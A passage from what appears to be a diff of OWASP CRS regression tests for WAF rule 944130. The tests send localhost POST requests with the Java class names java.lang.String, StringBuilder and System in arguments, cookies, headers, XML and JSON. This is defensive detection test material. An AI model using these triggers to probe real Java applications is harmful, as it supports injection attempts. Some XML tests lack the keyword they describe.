"HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-357 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 357 desc: "Request header test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-358 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 358 desc: "XML attribute value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-359 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 359 desc: "XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-360 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 360 desc: "Nested XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-361 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 361 desc: "Content-Type text/plain includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-362 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log: + expect_ids: [944130] + - test_id: 362 desc: "Content-Type application/json arg value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.String\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-363 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log: + expect_ids: [944130] + - test_id: 363 desc: "Content-Type application/json arg name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.String\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-364 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 364 desc: "Argument test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-365 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 365 desc: "Argument name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-366 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log: + expect_ids: [944130] + - test_id: 366 desc: "Cookie test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-367 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 367 desc: "Cookie name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.StringBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-368 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 368 desc: "Request header test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-369 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 369 desc: "XML attribute value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-370 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 370 desc: "XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-371 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 371 desc: "Nested XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-372 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 372 desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-373 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log: + expect_ids: [944130] + - test_id: 373 desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.StringBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-374 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log: + expect_ids: [944130] + - test_id: 374 desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.StringBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-375 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 375 desc: "Argument test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-376 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 376 desc: "Argument name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-377 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log: + expect_ids: [944130] + - test_id: 377 desc: "Cookie test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-378 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 378 desc: "Cookie name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.System=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-379 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 379 desc: "Request header test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-380 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 380 desc: "XML attribute value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-381 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 381 desc: "XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-382 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 382 desc: "Nested XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-383 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 383 desc: "Content-Type text/plain includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-384 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log: + expect_ids: [944130] + - test_id: 384 desc: "Content-Type application/json arg value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.System\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-385 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 